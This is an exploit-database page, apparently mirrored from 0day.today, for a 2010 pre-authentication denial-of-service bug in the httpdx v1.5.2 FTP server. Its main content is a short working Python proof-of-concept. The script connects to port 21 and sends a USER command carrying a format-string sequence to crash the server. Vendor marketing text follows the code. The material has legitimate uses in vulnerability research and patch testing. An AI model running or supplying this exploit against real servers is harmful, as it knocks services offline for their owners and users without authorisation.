Lucene search
K

httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)

🗓️ 07 Feb 2010 00:00:00Reported by loneferretType 
zdt
 zdt
🔗 0day.today👁 12 Views

httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash) found by loneferret, tested on Windows XP SP3 Professional

Code
=======================================================
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
=======================================================

# Title: httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
# Found by: loneferret
# Hat's off to dookie2000ca
# Discovered on: 06/02/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional
 
# Nod to the Exploit-DB Team
 
#!/usr/bin/python
 
import socket
 
buffer = "\x25\x6e"
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
s.recv(1024) #
s.close #don't really need these, force of habit



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation